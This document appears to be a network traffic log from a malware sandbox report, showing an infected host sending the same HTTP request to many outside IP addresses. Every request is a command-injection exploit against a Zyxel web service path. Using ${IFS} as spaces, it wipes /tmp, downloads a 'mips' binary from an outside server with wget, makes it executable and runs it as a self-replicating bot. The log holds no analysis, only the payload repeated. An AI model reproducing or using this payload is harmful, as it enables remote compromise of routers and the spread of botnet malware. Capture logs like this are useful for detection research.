                                        Mar 31, 2024 09:22:04.442359924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6887192.168.2.2339830136.222.41.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442414999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6888192.168.2.234750431.21.55.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442449093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6889192.168.2.2350590167.150.89.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442504883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6890192.168.2.234733490.189.181.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442548990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6891192.168.2.2335902102.65.84.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442615986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6892192.168.2.234989451.55.102.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442657948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6893192.168.2.2333434159.217.147.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442707062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6894192.168.2.2343674173.26.4.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442758083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6895192.168.2.235942019.58.66.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442809105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6896192.168.2.235153076.154.8.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442847013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6897192.168.2.233981468.219.125.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442902088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6898192.168.2.2358926174.71.128.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.442946911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6899192.168.2.235012462.44.215.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443022966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6900192.168.2.2334212181.167.167.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443053007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6901192.168.2.2336248175.224.94.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443106890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6902192.168.2.2348028156.154.113.253443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443147898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6903192.168.2.233603639.63.117.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443202019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6904192.168.2.2340838167.244.91.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443238974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6905192.168.2.2344962100.206.58.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443288088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6906192.168.2.2337628190.231.201.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443344116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6907192.168.2.2334564175.208.197.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443391085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6908192.168.2.233548876.168.206.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443420887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6909192.168.2.235040635.238.103.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443490028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6910192.168.2.235814639.90.91.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443521976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6911192.168.2.2351424183.34.198.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443573952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6912192.168.2.233728478.88.126.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443629026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6913192.168.2.233695895.181.126.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443666935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6914192.168.2.23429949.154.58.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443731070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6915192.168.2.2357748198.88.154.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443767071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6916192.168.2.2356334137.24.214.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443825006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6917192.168.2.2351194145.218.43.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443861008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6918192.168.2.23510401.4.53.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443927050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6919192.168.2.2333672158.15.94.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.443970919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6920192.168.2.234085294.147.157.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444030046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6921192.168.2.235754644.215.233.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444093943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6922192.168.2.233759646.253.219.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444139004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6923192.168.2.234131273.33.82.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444184065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6924192.168.2.233543287.134.173.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444224119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6925192.168.2.23579821.213.63.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444268942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6926192.168.2.2337546171.225.236.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444318056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6927192.168.2.2339532203.127.133.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444360971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6928192.168.2.2342156170.215.224.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444418907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6929192.168.2.2343670189.191.42.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444468021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6930192.168.2.2343800167.234.216.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444504976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6931192.168.2.2354356202.154.153.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444564104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6932192.168.2.2344550116.219.163.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444603920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6933192.168.2.2347834180.85.193.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444657087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6934192.168.2.2338898197.188.72.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444708109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6935192.168.2.2346704212.255.127.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444755077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6936192.168.2.233439042.60.233.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444807053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6937192.168.2.233854084.138.0.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444853067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6938192.168.2.235180868.15.59.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444911957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6939192.168.2.2351970188.165.218.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.444967031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6940192.168.2.2357422221.11.56.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.445020914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6941192.168.2.233753449.142.115.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.445080996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6942192.168.2.23421521.176.117.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.445111036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6943192.168.2.234703443.246.131.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.445177078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6944192.168.2.2348682221.15.211.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.445224047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6945192.168.2.2352816103.248.7.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.445276976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6946192.168.2.2341850110.163.37.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.445319891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6947192.168.2.2360444174.70.11.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.445374012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6948192.168.2.2355092116.180.211.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.445420980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6949192.168.2.2356676136.142.213.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.452765942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6950192.168.2.2333640105.182.15.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.452800989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6951192.168.2.235958617.246.54.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.452852964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6952192.168.2.234044420.231.9.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.452894926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6953192.168.2.235049232.124.170.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:04.452924013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6954192.168.2.235953637.89.149.207443
                                        TimestampBytes transferredDirectionData
